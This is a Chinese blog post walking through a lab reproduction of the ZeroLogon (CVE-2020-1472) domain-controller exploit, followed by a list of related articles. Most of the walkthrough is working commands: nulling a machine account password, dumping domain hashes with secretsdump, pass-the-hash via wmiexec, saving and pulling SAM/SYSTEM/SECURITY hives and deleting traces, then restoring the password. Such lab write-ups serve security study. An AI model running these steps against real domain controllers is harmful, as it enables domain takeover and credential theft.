CVE-2020-1472复现与完整利用

最新推荐文章于 2022-11-15 16:07:43 发布
最新推荐文章于 2022-11-15 16:07:43 发布
阅读量1k 收藏 1
点赞数
分类专栏: 系统维护(Windows & Linux) 配置笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z136370204/article/details/109730120
版权
本文详细介绍了CVE-2020-1472漏洞的利用过程,包括修改Impacket库、空机器账户密码、读取管理员密码、下载SAM文件、破解SAM、重置密码和验证恢复等步骤。通过一系列命令行工具,如pythonsecretsdump.py和pythonwmiexec.py,实现对域控服务器的权限提升。
摘要由CSDN通过智能技术生成

CVE-2020-1472复现与完整利用

 

CATALOG

 

漏洞原理

原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html

利用

1.修改文件impacket.dcerpc.v5.nrpc

需要利用https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py文件替换本机上的nrpc文件。本机nrpc文件存储路径为:C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

2.置空机器账户yukong$密码

python cve-2020-1472-exploit.py 机器账户名 ip
在这里插入图片描述
且发现机器账户的密码已经置空,31dc…代表空密码。
在这里插入图片描述

获取对方机器账号或者说netbios名的方式:

  1. net view

    这个服务器名称带上$就是机器名,例如lisi$或者yukong$。
  1. nbtstat -A ip
    在这里插入图片描述
    确定域控ip的方法有很多,例如:
  2. 查看开启53端口的主机
  3. net time看回显会返回域控的主机名,然后ping即可
  4. systeminfo命令查看域那块儿的值,ping一下就是域控的ip
  5. 看自己主机的dns

3.读取administrator密码

python secretsdump.py test.com/yukong$@192.168.124.142 -no-pass
在这里插入图片描述
发现此时可以使用空密码的机器账户读取域控上的用户hash。

4.下载目标的sam文件为下一步恢复机器密码做准备

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.124.142
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

exit

在这里插入图片描述
执行完成后可在wmiexec脚本所在的文件夹发现下载下来的文件:
在这里插入图片描述

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/yukong$@192.168.124.142 -use-vss
此命令执行失败

5.破解sam文件查看过去的机器密码

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
在这里插入图片描述
保存红色圈中的密码,这个就是过去的机器密码,也就是aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a。

6.重制密码yukong$机器密码

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a
在这里插入图片描述

7.查看密码是否恢复成功

python secretsdump.py test.com/administrator:123@192.168.124.142 -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/administrator@192.168.124.142 -just-dc-user yukong$
在这里插入图片描述
发现恢复成功。

代码:https://github.com/shanfenglan/cve-2020-1472

z荒野求生
关注
专栏目录
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2345
Text. 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
开源项目CVE-2020-1472实战指南
最新发布
gitblog_00615的博客
08-08 322
开源项目CVE-2020-1472实战指南 CVE-2020-1472Test tool for CVE-2020-1472项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2020-1472 项目介绍 此项目专注于复现并理解著名的安全漏洞CVE-2020-1472,又名“ZeroLogon”攻击。该漏洞存在于Windows的Netlogon远程协议中,允许未...
域内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5646
前一段时间打ctf第一次接触域渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
CVE-2020-1472复现
weixin_44216796的博客
01-01 306
域环境搭建 环境:windows server 2019 下一步等待安装完成。 漏洞验证 使用如下命令进行验证: git clone https://github.com/SecuraBV/CVE-2020-1472 cd CVE-2020-1472 python3 -m pip install -r requirements.txt python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR 出现下图提示证明存在该漏洞: 漏洞利用
NetLogon特权提升漏洞(CVE-2020-1472复现及问题解决
热门推荐
Love&Share
09-17 1万+
NetLogon特权提升漏洞(CVE-2020-1472复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
【Apache Tomcat与Session反序列化漏洞CVE-2020-9484详解】 Apache Tomcat是一款广泛使用的开源Web应用服务器,它基于Java,主要用于运行Servlet和JSP(JavaServer Pages)应用程序。在2020年,Tomcat被发现存在一...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能导致中间人攻击。在某些配置下,攻击者可能诱使客户端接受较弱的密钥交换算法,从而削弱通信的安全性。 2. CVE-2018-15473:这个漏洞涉及到...
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 1142
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远 程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。
CVE-2020-1472 poc复现
m0_46580995的博客
09-15 485
测试脚本(https://github.com/SecuraBV/CVE-2020-1472) python3 exp NetBIOS名称(域名)ip 搭建winsever2016主域控制器搭建(https://blog.51cto.com/lizmfinder/2127943)
内网定位+CVE-2020-1472-利用过程
课嗨教育的专栏
04-01 295
域控(Win2008):192.168.199.131 域用户(Win7):192.168.199.128 域用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:http
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7161
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机域密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472 域内提权复现
weixin_39811856的博客
09-22 489
1.利用流程 漏洞利用 流程如下: 1、 置空域控保存在AD中的密码 2、 获取域控用户HASH 3、通过获取到的管理员HASH得到一个SHELL 2.安装最新的impacket: https://github.com/SecureAuthCorp/impacket 注意:不要下载tags里面的,tags里面还是3月份的! 3.漏洞利用: 1)置空(置空的不是管理员账号密码) 2)使用空密码dump域控上的hash 如图: WIN-I0E7JQ4II7A$用户hash已被替..
CVE-2020-1472复现过程(不需要输入DC Name)
weixin_39811856的博客
02-10 340
环境搭建 Windows server 2012R2 IP:192.168.146.183 漏洞利用 使用mimikatz进行检测 使用mimikatz进行密码置空 在大部分网上所给出的脚本中,发现DC Name需要手动输入,根据系统命令的调用,发现通过系统命令可得到局域网内主机的DC Name Windows: Linux: 检测脚本(仅检测,不具有破坏性)可调用系统命令得到局域网内DC Name: 在使用检测脚本时,要求impacket库版本为0.9...
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1455
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 Z
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。
CVE-2020-1472(域内提权)
p01son的博客
08-02 697
CVE-2020-1472(域内提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(域内提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
cve-2020-9484 漏洞复现
08-09
需要注意的是,CVE-2020-9484漏洞可能会导致未经授权的远程代码执行,攻击者可以利用此漏洞来执行任意代码,可能导致服务器受到严重影响。在验证漏洞后,建议尽快升级Tomcat服务器,安装相应的补丁或增加其他安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值